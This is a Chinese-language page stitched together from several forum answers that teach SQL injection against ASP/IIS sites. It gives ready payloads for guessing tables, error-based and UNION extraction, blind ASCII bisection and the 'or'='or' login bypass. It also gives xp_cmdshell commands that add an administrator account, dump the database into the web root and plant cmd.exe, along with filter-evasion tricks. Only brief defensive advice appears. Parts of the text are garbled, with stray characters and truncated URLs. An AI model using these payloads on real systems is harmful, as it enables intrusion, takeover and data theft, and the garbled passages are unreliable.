sql注入欄位

⑴ sql注入的注入方法

先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count（列名） from 表名）<>0
或者也可以這樣
and exists (select * from 表名）
and exists (select 列名 from 表名）
返回正確的，那麼寫的表名或列名就是正確
這里要注意的是，exists這個不能應用於猜內容上，例如and exists (select len(user) from admin)>3 這樣是不行的
很多人都是喜歡查詢裡面的內容，一旦iis沒有關閉錯誤提示的，那麼就可以利用報錯方法輕松獲得庫裡面的內容
獲得資料庫連接用戶名：；and user>0
這個是小竹提出來的，我這里引用《SQL注入天書》裡面的一段話來講解：
重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar轉換int異常，XXXX不能轉換成int
看到這里大家明白了吧，報錯的原理就是利用SQLserver內置的系統表進行轉換查詢，轉換過程會出錯，然後就會顯示出在網頁上，另外還有類似的and 1=(selet top 1 user from admin），這種語句也是可以爆出來的。；and db_name()>0 則是暴資料庫名。
一旦關閉了IIS報錯，那麼還可以用union（聯合查詢）來查內容，主要語句就是
Order by 10
And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
上面的order by 10主要就是查欄位數目，admin就是表名，可以自己猜，user,passwd是列名
反正就是返回正確即對，返回異常即錯
另外還有十分常用的ASCII碼拆半法
先要知道指定列名，例如user里的內容的長度
and (select len(user) from admin)=2 就是查詢長度為不為2位，返回錯誤的增加或減少數字，一般這個數字不會太大，太大的就要放棄了，猜也多餘
後面的邏輯符號可以根據不同要求更改的，
>；大於 <；小於 =就是等於咯，更新語句的話，=也可以表示傳遞符號 <>；就是不等
知道了長度後就可以開始猜解了
And (Select top 1 asc(mid(user,n,1)) from admin)>100
n就是猜解的表名的第幾位，最後的長度數字就是剛才猜解出來的列名長度了，And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里內容的第一位的ASCII字元是不是大於100
正確的話，那麼表示USER第一個字元的ASCII碼大於100，那麼就猜>120，返回錯誤就是介於100－120之間，然後再一步一步的縮少，最終得到正確字元XXX，然後用ASCII轉換器吧這個轉換成普通字元就可以了
然後就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去
加在url後面，列名表名還是先猜解，返回正確的代表帳號的ASCII碼大於100，那麼就再向前猜，直到報錯，把猜出來的ASCII碼拿去ASCII轉換器轉換就可以了，中文是負數，加上asb取絕對值
And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320
得到之後就記得在數字前加-號，不然ASCII轉換器轉換不來的，中文在ASCII碼里是-23423這樣的，所以猜起來挺麻煩
這個猜解速度比較慢，但是效果最好，最具有廣泛性 後台身份驗證繞過漏洞
驗證繞過漏洞就是'or'='or'後台繞過漏洞，利用的就是AND和OR的運算規則，從而造成後台腳本邏輯性錯誤
例如管理員的賬號密碼都是admin，那麼再比如後台的資料庫查詢語句是
user=request(user)
passwd=request(passwd)
sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''
那麼我使用'or 'a'='a來做用戶名密碼的話，那麼查詢就變成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
這樣的話，根據運算規則，這里一共有4個查詢語句，那麼查詢結果就是 假or真and假or真，先算and 再算or，最終結果為真，這樣就可以進到後台了
這種漏洞存在必須要有2個條件，第一個：在後台驗證代碼上，賬號密碼的查詢是要同一條查詢語句，也就是類似
sql=select * from admin where username='&username&'&passwd='&passwd&'
如果一旦賬號密碼是分開查詢的，先查帳號，再查密碼，這樣的話就沒有辦法了。
第二就是要看密碼加不加密，一旦被MD5加密或者其他加密方式加密的，那就要看第一種條件有沒有可以，沒有達到第一種條件的話，那就沒有戲了 防禦方法
對於怎麼防禦SQL注入呢，這個網上很多，我這里講幾個
如果自己編寫防注代碼，一般是先定義一個函數，再在裡面寫入要過濾的關鍵詞，如select ; 「」；from；等，這些關鍵詞都是查詢語句最常用的詞語，一旦過濾了，那麼用戶自己構造提交的數據就不會完整地參與資料庫的操作。
當然如果你的網站提交的數據全部都是數字的，可以使用小竹提供的方法
Function SafeRequest(ParaName,ParaType)
'--- 傳入參數 ---
'ParaName：參數名稱-字元型
'ParaType：參數類型-數字型（1表示以上參數是數字，0表示以上參數為字元）
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write 參數 & ParaName & 必須為數字型！
Response.end
End if
Else
ParaValue=replace(ParaValue,','')
End if
SafeRequest=ParaValue
End function
然後就用SafeRequest（）來過濾參數 ，檢查參數是否為數字，不是數字的就不能通過。 SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析，構造巧妙的SQL語句，從而成功獲取想要的數據，是高手與「菜鳥」的根本區別。

⑵ 關於SQL注入。

SQL注入原理深度解析作者：admin 文章來源：轉載 點擊數：699 更新時間：2008-8-29 -------------------------------------------------------------------------------- 對於Web應用來說，注射式攻擊由來已久，攻擊方式也五花八門，常見的攻擊方式有SQL注射、命令注射以及新近才出現的XPath注射等等。本文將以SQL注射為例，在源碼級對其攻擊原理進行深入的講解。 一、注射式攻擊的原理 注射式攻擊的根源在於，程序命令和用戶數據（即用戶輸入）之間沒有做到涇渭分明。這使得攻擊者有機會將程序命令當作用戶輸入的數據提交給We程序，以發號施令，為所欲為。 為了發動注射攻擊，攻擊者需要在常規輸入中混入將被解釋為命令的「數據」，要想成功，必須要做三件事情： 1.確定Web應用程序所使用的技術 注射式攻擊對程序設計語言或者硬體關系密切，但是這些可以通過適當的踩點或者索性將所有常見的注射式攻擊都搬出來逐個試一下就知道了。為了確定所採用的技術，攻擊者可以考察Web頁面的頁腳，查看錯誤頁面，檢查頁面源代碼，或者使用諸如Nessus等工具來進行刺探。 2.確定所有可能的輸入方式 Web應用的用戶輸入方式比較多，其中一些用戶輸入方式是很明顯的，如HTML表單；另外，攻擊者可以通過隱藏的HTML表單輸入、HTTP頭部、cookies、甚至對用戶不可見的後端AJAX請求來跟Web應用進行交互。一般來說，所有HTTP的GET和POST都應當作用戶輸入。為了找出一個Web應用所有可能的用戶輸入，我們可以求助於Web代理，如Burp等。 3.查找可以用於注射的用戶輸入 在找出所有用戶輸入方式後，就要對這些輸入方式進行篩選，找出其中可以注入命令的那些輸入方式。這個任務好像有點難，但是這里有一個小竅門，那就是多多留意Web應用的錯誤頁面，很多時候您能從這里得到意想不到的收獲。 二、SQL注射原理 上面對注射攻擊做了一般性的解釋，下面我們以SQL注射為例進行講解，以使讀者對注射攻擊有一個感性的認識，至於其他攻擊，原理是一致的。 SQL注射能使攻擊者繞過認證機制，完全控制遠程伺服器上的資料庫。SQL是結構化查詢語言的簡稱，它是訪問資料庫的事實標准。目前，大多數Web應用都使用SQL資料庫來存放應用程序的數據。幾乎所有的Web應用在後台都使用某種SQL資料庫。跟大多數語言一樣，SQL語法允許資料庫命令和用戶數據混雜在一起的。如果開發人員不細心的話，用戶數據就有可能被解釋成命令，這樣的話，遠程用戶就不僅能向Web應用輸入數據，而且還可以在資料庫上執行任意命令了。 三、繞過用戶認證 我們這里以一個需要用戶身份認證的簡單的Web應用程序為例進行講解。假定這個應用程序提供一個登錄頁面，要求用戶輸入用戶名和口令。用戶通過HTTP請求發送他們的用戶名和口令，之後，Web應用程序檢查用戶傳遞來用戶名和口令跟資料庫中的用戶名和口令是否匹配。這種情況下，會要求在SQL資料庫中使用一個資料庫表。開發人員可以通過以下SQL語句來創建表： CREATETABLEuser_table( idINTEGERPRIMARYKEY, usernameVARCHAR(32), passwordVARCHAR(41) ); 上面的SQL代碼將建立一個表，該表由三欄組成。第一欄存放的是用戶ID，如果某人經過認證，則用此標識該用戶。第二欄存放的是用戶名，該用戶名最多由32字元組成。第三欄存放的是口令，它由用戶的口令的hash值組成，因為以明文的形式來存放用戶的口令實在太危險，所以通常取口令的散列值進行存放。我們將使用SQL函數PASSWORD（）來獲得口令的hash值，在MySQL中，函數PASSWORD（）的輸出由41字元組成。 對一個用戶進行認證，實際上就是將用戶的輸入即用戶名和口令跟表中的各行進行比較，如果跟某行中的用戶名和口令跟用戶的輸入完全匹配，那麼該用戶就會通過認證，並得到該行中的ID。假如用戶提供的用戶名和口令分別為lonelynerd15和mypassword，那麼檢查用戶ID過程如下所示： SELECTidFROMuser_tableWHEREusername='lonelynerd15'ANDpassword=PASSWORD('mypassword') 如果該用戶位於資料庫的表中，這個SQL命令將返回該用戶相應的ID，這就意味著該用戶通過了認證；否則，這個SQL命令的返回為空，這意味著該用戶沒有通過認證。 下面是用來實現自動登錄的Java代碼，它從用戶那裡接收用戶名和口令，然後通過一個SQL查詢對用戶進行認證： Stringusername=req.getParameter("username"); Stringpassword=req.getParameter("password"); Stringquery="SELECTidFROMuser_tableWHERE"+ "username='"+username+"'AND"+ "password=PASSWORD('"+password+"')"; ResultSetrs=stmt.executeQuery(query); intid=-1;//-. while(rs.next()){ id=rs.getInt("id"); } 開頭兩行代碼從HTTP請求中取得用戶輸入，然後在下一行開始構造一個SQL查詢。執行查詢，然後在while（）循環中得到結果，如果一個用戶名和口令對匹配，就會返回正確的ID。否則，id的值仍然為-1，這意味著用戶沒有通過認證。表面上看，如果用戶名和口令對匹配，那麼該用戶通過認證；否則，該用戶不會通過認證——但是，事實果真如此嗎？非也！讀者也許已經注意到了，這里並沒有對SQL命令進行設防，所以攻擊者完全能夠在用戶名或者口令欄位中注入SQL語句，從而改變SQL查詢。為此，我們仔細研究一下上面的SQL查詢字元串： Stringquery="SELECTidFROMuser_tableWHERE"+ "username='"+username+"'AND"+ "password=PASSWORD('"+password+"')"; 上述代碼認為字元串username和password都是數據，不過，攻擊者卻可以隨心所欲地輸入任何字元。如果一位攻擊者輸入的用戶名為 』OR1=1— 而口令為 x 那麼查詢字元串將變成下面的樣子： SELECTidFROMuser_tableWHEREusername=''OR1=1--'ANDpassword =PASSWORD('x') 該雙劃符號--告訴SQL解析器，右邊的東西全部是注釋，所以不必理會。這樣，查詢字元串相當於： SELECTidFROMuser_tableWHEREusername=''OR1=1 如今的SELECT語句跟以前的已經大相徑庭了，因為現在只要用戶名為長度為零的字元串''或1=1這兩個條件中一個為真，就返回用戶標識符ID——我們知道，1=1是恆為真的。所以這個語句將返回user_table中的所有ID。在此種情況下，攻擊者在username欄位放入的是SQL指令'OR1=1--而非數據。 四、構造SQL注射代碼 為了成功地注入SQL命令，攻擊者必須將開發人員的現有SQL命令轉換成一個合法的SQL語句，當然，要盲注是有些難度的，但一般都是這樣： 'OR1=1– 或者 ')OR1=1-- 此外，許多Web應用提供了帶來錯誤報告和調試信息，例如，利用'OR1=1--對Web應用進行盲注時，經常看到如下所示的錯誤信息： Errorexecutingquery:YouhaveanerrorinyourSQLsyntax;tousenear'SELECT(title,body)FROMblog_tableWHEREcat='OR1=1'atline1 該錯誤信息詳細地為我們展示了完整的SQL語句，在此種情況下，SQL資料庫所期待的好象是一個整數，而非字元串，所以可以注入字元串OR1=1--，把單引號去掉就應該能成功注入了。對於大多數SQL資料庫，攻擊者可以在一行中放入多個SQL語句，只要各個語句的語法沒有錯誤就行。在下面的代碼中，我們展示了如何將username設為'OR1=1並把password設為x來返回最後的用戶ID： Stringquery="SELECTidFROMuser_tableWHERE"+ "username='"+username+"'AND"+ "password=PASSWORD('"+password+"')"; 當然，攻擊者可以注入其它的查詢，例如，把username設為： 'OR1=1;DROPTABLEuser_table;-- 而這個查詢將變成： SELECTidFROMuser_tableWHEREusername=''OR1=1;DROPTABLEuser_table;--'ANDpassword=PASSWORD('x'); 它相當於： SELECTidFROMuser_tableWHEREusername=''OR1=1;DROPTABLEuser_table; 這個語句將執行句法上完全正確的SELECT語句，並利用SQLDROP命令清空user_table。 注射式攻擊不必非要進行盲式攻擊，因為許多Web應用是利用開放源代碼工具開發的，為了提高注射式攻擊的成功率，我們可以下載免費的或者產品的試用版，然後在自己的系統上搭建測試系統。如果在測試系統上發現了錯誤，那麼很可能同樣的問題也會存在於所有使用該工具的Web應用身上。 五、小結 我們在本文中向讀者介紹了注射攻擊的根本原因，即沒有對數據和命令進行嚴格區分。然後通過一些程序源碼對SQL的攻擊進行了細致的分析，使我們對SQL注射機理有了一個深入的認識。如果您是一名web應用開發人員，那麼您就當心了，一定不要盲目相信用戶端的輸入，而要對用戶輸入的數據進行嚴格的「消毒」處理，否則的話，SQL注射將會不期而至。 【51CTO.COM 獨家特稿，轉載請註明出處及作者！】 本篇文章來源於 新世紀網安基地 (www.520hack.com) 原文出處： http://www.520hack.com/Article/Text5/server/200808/11251.html 詳細吧。。 求給分額！

⑶ SQL注入漏洞的判斷

分類: 電腦/網路 >> 反病毒
解析:

如果以前沒玩過注入，

請把IE菜單-工具-Inter選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以asp?id=xx(" target=_blank>hackbase/news?id=xx(這個地址是假想的)

為例進行分析，xx可能是整型，也有可能是字元串。

1、整型參數的判斷

當輸入的參數xx為整型時，通常news中SQL語句原貌大致如下：

select * from 表名 where 欄位=xx，所以可以用以下步驟測試SQL注入是否存在。

最簡單的判斷方法
hackbase/news?id=xx』(附加一個單引號)，

此時news中的SQL語句變成了

select * from 表名 where 欄位=xx』，

如果數沖程序沒有過濾好「』」的話

就會提示 news運行異常；

但這樣的方法雖然很簡單，但並不是最好的

因為

first,不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，

如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，

但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。

請和系統管理員聯絡。

second，目前大多數程序員已經將「』「 過濾掉，所握畢戚以用」 』」測試不到注入點

所以一般使用經典的1=1和1=2測試方法

見下文：
hackbase/news?id=xx and 1=1, news運行正常，

而且與hackbase/news?id=xx運行結果相同；
hackbase/news?id=xx and 1=2, news運行異常；（這就是經典的 1=1 ;1=2 判斷方法）

如果以上面滿足，news中就會存在SQL注入漏洞，反之則可能不能注入。

2、字元串型參數的判斷

方法與數值型參數判斷方法基本相同

當輸入的參數xx為字元串時，通常news中SQL語句原貌大致如下：

select * from 表名 where 欄位='xx'，所以可以用以下步驟測試SQL注入是否存在。
hackbase/news?id=xx』(附加一個單引號)，此時news中的SQL語句變成了

select * from 表名 where 欄位=xx』，news運行異常；
hackbase/news?id=xx and '1'='1', news運行正常，

而且與hackbase/news?id=xx運行結果相同；
hackbase/news?id=xx and '1'='2', news運行異常；

如果以上滿足，則news存在SQL注入漏洞，反之則不能注入

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。

①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等

；URLEncode信息參見附件一；

③ASCII碼法：可以把輸入的部分或全部字元全部段陵

<4>出了上述方法以外，還有個更簡單的方法就是使用現成的工具

像NB聯盟的NBSI就是一款很不錯的工具，目前最新的版本為2.2

⑷ 什麼是SQL注入

SQL注入：利用現有應用程序，將(惡意)的SQL命令注入到後台資料庫引擎執行的能力，這是SQL注入的標准釋義。
隨著B/S模式被廣泛的應用，用這種模式編寫應用程序的程序員也越來越多，但由於開發人員的水平和經驗參差不齊，相當一部分的開發人員在編寫代碼的時候，沒有對用戶的輸入數據或者是頁面中所攜帶的信息（如Cookie）進行必要的合法性判斷，導致了攻擊者可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得一些他想得到的數據。

SQL注入利用的是正常的HTTP服務埠，表面上看來和正常的web訪問沒有區別，隱蔽性極強，不易被發現。
SQL注入攻擊過程分為五個步驟：
第一步：判斷Web環境是否可以SQL注入。如果URL僅是對網頁的訪問，不存在SQL注入問題，如：http://www.../162414739931.shtml就是普通的網頁訪問。只有對資料庫進行動態查詢的業務才可能存在SQL注入，如：http://www...../webhp?id＝39，其中?id＝39表示資料庫查詢變數，這種語句會在資料庫中執行，因此可能會給資料庫帶來威脅。
第二步：尋找SQL注入點。完成上一步的片斷後，就要尋找可利用的注入漏洞，通過輸入一些特殊語句，可以根據瀏覽器返回信息，判斷資料庫類型，從而構建資料庫查詢語句找到注入點。

第三步：猜解用戶名和密碼。資料庫中存放的表名、欄位名都是有規律可言的。通過構建特殊資料庫語句在資料庫中依次查找表名、欄位名、用戶名和密碼的長度，以及內容。這個猜測過程可以通過網上大量注入工具快速實現，並藉助破解網站輕易破譯用戶密碼。

第四步：尋找WEB管理後台入口。通常WEB後台管理的界面不面向普通用戶

開放，要尋找到後台的登陸路徑，可以利用掃描工具快速搜索到可能的登陸地址，依次進行嘗試，就可以試出管理台的入口地址。

第五步：入侵和破壞。成功登陸後台管理後，接下來就可以任意進行破壞行為，如篡改網頁、上傳木馬、修改、泄漏用戶信息等，並進一步入侵資料庫伺服器。
SQL注入攻擊的特點:

變種極多，有經驗的攻擊者會手動調整攻擊參數，致使攻擊數據的變種是不可枚舉的，這導致傳統的特徵匹配檢測方法僅能識別相當少的攻擊，難以防範。

攻擊過程簡單，目前互聯網上流行眾多的SQL注入攻擊工具，攻擊者藉助這些工具可很快對目標WEB系統實施攻擊和破壞。

危害大，由於WEB編程語言自身的缺陷以及具有安全編程能力的開發人員少之又少，大多數WEB業務系統均具有被SQL注入攻擊的可能。而攻擊者一旦攻擊成功，可以對控制整個WEB業務系統，對數據做任意的修改，破壞力達到及至。

SQL注入的危害和現狀

SQL注入的主要危害包括：

未經授權狀況下操作資料庫中的數據

惡意篡改網頁內容

私自添加系統帳號或者是資料庫使用者帳號

網頁掛木馬

如何防止SQL參數：
1，檢查上傳的數據，並過濾
2. 禁止拼接SQL字元串
3.使用SQL參數化處理
4．載入防入侵等硬體設施

⑸ 求教誰給講講SQL注入攻擊的步驟

第一步：SQL注入點探測。探測SQL注入點是關鍵的第一步，通過適當的分析應用程序，可以判斷什麼地方存在SQL注入點。通常只要帶有輸入提交的動態網頁，並且動態網頁訪問資料庫，就可能存在SQL注入漏洞。如果程序員信息安全意識不強，採用動態構造SQL語句訪問資料庫，並且對用戶輸入未進行有效驗證，則存在SQL注入漏洞的可能性很大。一般通過頁面的報錯信息來確定是否存在SQL注入漏洞。
第二步：收集後台資料庫信息。不同資料庫的注入方法、函數都不盡相同，因此在注入之前，我們先要判斷一下資料庫的類型。判斷資料庫類型的方法有很多，可以輸入特殊字元，如單引號，讓程序返回錯誤信息，我們根據錯誤信息提示進行判斷，還可以使用特定函數來判斷。
第三步：猜解用戶名和密碼。資料庫中的表和欄位命名一般都是有規律的，通過構造特殊的SQL語句在資料庫中依次猜解出表名、欄位名、欄位數、用戶名和密碼。
第四步：查找Web後台管理入口。Web後台管理通常不對普通用戶開放，要找到後台管理的登錄網址，可以利用Web目錄掃描工具快速搜索到可能的登錄地址，然後逐一嘗試，便可以找到後台管理平台的登錄網址。
第五步：入侵和破壞。一般後台管理具有較高許可權和較多的功能，使用前面已破譯的用戶名、密碼成功登錄後台管理平台後，就可以任意進行破壞，比如上傳木馬、篡改網頁、修改和竊取信息等，還可以進一步提權，入侵Web伺服器和資料庫伺服器。

⑹ SQL注入是怎麼回事

SQL注入攻擊是黑客對資料庫進行攻擊的常用手段之一。隨著B/S模式應用開發的發展，使用這種模式編寫應用程序的程序員也越來越多。但是由於程序員的水平及經驗也參差不齊，相當大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。SQL注入是從正常的WWW埠訪問，而且表面看起來跟一般的Web頁面訪問沒什麼區別，所以目前市面的防火牆都不會對SQL注入發出警報，如果管理員沒查看IIS日誌的習慣，可能被入侵很長時間都不會發覺。但是，SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況，需要構造巧妙的SQL語句，從而成功獲取想要的數據。

SQL注入攻擊的總體思路

·發現SQL注入位置；
·判斷後台資料庫類型；
·確定XP_CMDSHELL可執行情況
·發現WEB虛擬目錄
·上傳ASP木馬；
·得到管理員許可權；

SQL注入攻擊的步驟
一、SQL注入漏洞的判斷

一般來說，SQL注入一般存在於形如：http://xxx.xxx.xxx/abc.asp?id=XX等帶有參數的ASP動態網頁中，有時一個動態網頁中可能只有一個參數，有時可能有N個參數，有時是整型參數，有時是字元串型參數，不能一概而論。總之只要是帶有參數的動態網頁且此網頁訪問了資料庫，那麼就有可能存在SQL注入。如果ASP程序員沒有安全意識，不進行必要的字元過濾，存在SQL注入的可能性就非常大。

為了全面了解動態網頁回答的信息，首選請調整IE的配置。把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以http://xxx.xxx.xxx/abc.asp?p=YY為例進行分析，YY可能是整型，也有可能是字元串。

1、整型參數的判斷

當輸入的參數YY為整型時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 欄位=YY，所以可以用以下步驟測試SQL注入是否存在。
①http://xxx.xxx.xxx/abc.asp?p=YY』(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY』，abc.asp運行異常；
②http://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常，而且與http://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③http://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。

2、字元串型參數的判斷

當輸入的參數YY為字元串時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 欄位='YY'，所以可以用以下步驟測試SQL注入是否存在。
①http://xxx.xxx.xxx/abc.asp?p=YY』(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY』，abc.asp運行異常；
②http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... 39;1'='1', abc.asp運行正常，而且與http://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... 39;1'='2', abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。
①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；
②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；
③ASCII碼法：可以把輸入的部分或全部字元全部用ASCII碼代替，如U=chr(85),a=chr(97)等，ASCII信息參見附件二；

二、分析資料庫伺服器類型

一般來說，ACCESS與SQL－SERVER是最常用的資料庫伺服器，盡管它們都支持T－SQL標准，但還有不同之處，而且不同的資料庫有不同的攻擊方法，必須要區別對待。

1、 利用資料庫伺服器的系統變數進行區分
SQL－SERVER有user,db_name()等系統變數，利用這些系統值不僅可以判斷SQL-SERVER，而且還可以得到大量有用信息。如：
① http://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前連接到資料庫的用戶名
②http://xxx.xxx.xxx/abc.asp?p=YY&;n ... db_name()>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前正在使用的資料庫名；

2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問許可權，而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問許可權。對於以下兩條語句：
①http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
若資料庫是SQL-SERVE，則第一條，abc.asp一定運行正常，第二條則異常；若是ACCESS則兩條都會異常。

3、 MSSQL三個關鍵系統表
sysdatabases系統表：Microsoft SQL Server 上的每個資料庫在表中佔一行。最初安裝 SQL Server 時，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 資料庫的項。該表只存儲在 master 資料庫中。 這個表保存在master資料庫中，這個表中保存的是什麼信息呢？這個非常重要。他是 保存了所有的庫名,以及庫的ID和一些相關信息。
這里我把對於我們有用的欄位名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID，dbid從1到5是系統的。分別是：master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。

Sysobjects：SQL-SERVER的每個資料庫內都有此系統表，它存放該資料庫內創建的所有對象，如約束、默認值、日誌、規則、存儲過程等，每個對象在表中佔一行。

syscolumns：每個表和視圖中的每列在表中佔一行，存儲過程中的每個參數在表中也佔一行。該表位於每個資料庫中。主要欄位有：
name ，id， colid ：分別是欄位名稱，表ID號，欄位ID號，其中的 ID 是 剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中，表的ID是123456789中的所有欄位列表。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省

1、http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... er>0 abc.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。
2、http://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到當前連接的資料庫名。
3、http://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主資料庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、http://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增加的帳戶aaa加到administrators組中。
5、http://xxx.xxx.xxx/abc.asp?p=YY；backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
http://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell 「 c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

⑺ 關於SQL注入

<二>SQL注入思路

思路最重要。其實好多人都不知道SQL到底能做什麼呢？這里總結一下SQL注入入侵的總體的思路：

1. SQL注入漏洞的判斷，即尋找注入點

2. 判斷後台資料庫類型

3. 確定XP_CMDSHELL可執行情況；若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過幾種方法完全控制，也就完成了整個注入過程，否則繼續：

1. 發現WEB虛擬目錄

2. 上傳ASP木馬；

3. 得到管理員許可權

具體步驟：

一、SQL注入漏洞的判斷

如果以前沒玩過注入，請把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以http://www.163.com/news.asp?id=xx(這個地址是假想的)，為例進行分析，xx可能是整型，也有可能是字元串。

1、整型參數的判斷

當輸入的參數xx為整型時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 欄位=xx，所以可以用以下步驟測試SQL注入是否存在。

最簡單的判斷方法

http://www.163.com/news.asp?id=xx』(附加一個單引號)，

此時news.asp中的SQL語句變成了

select * from 表名 where 欄位=xx』，

如果程序沒有過濾好「』」的話，就會提示 news.asp運行異常；但這樣的方法雖然很簡單，但並不是最好的，因為：

first,不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

second，目前大多數程序員已經將「』「 過濾掉，所以用」 』」測試不到注入點，所以一般使用經典的1=1和1=2測試方法，見下文：

http://www.163.com/news.asp?id=xx and 1=1, news.asp運行正常，

而且與http://www.163.com/news.asp?id=xx運行結果相同；

http://www.163.com/news.asp?id=xx and 1=2, news.asp運行異常；（這就是經典的 1=1 1=2 判斷方法）

如果以上面滿足，news.asp中就會存在SQL注入漏洞，反之則可能不能注入。

2、字元串型參數的判斷

方法與數值型參數判斷方法基本相同

當輸入的參數xx為字元串時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 欄位='xx'，所以可以用以下步驟測試SQL注入是否存在。

http://www.163.com/news.asp?id=xx』(附加一個單引號)，此時news.asp中的SQL語句變成了
select * from 表名 where 欄位=xx』，news.asp運行異常；
http://www.163.com/news.asp?id=xx and '1'='1', news.asp運行正常，

而且與http://www.163.com/news.asp?id=xx運行結果相同；

http://www.163.com/news.asp?id=xx and '1'='2', news.asp運行異常；

如果以上滿足，則news.asp存在SQL注入漏洞，反之則不能注入

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。

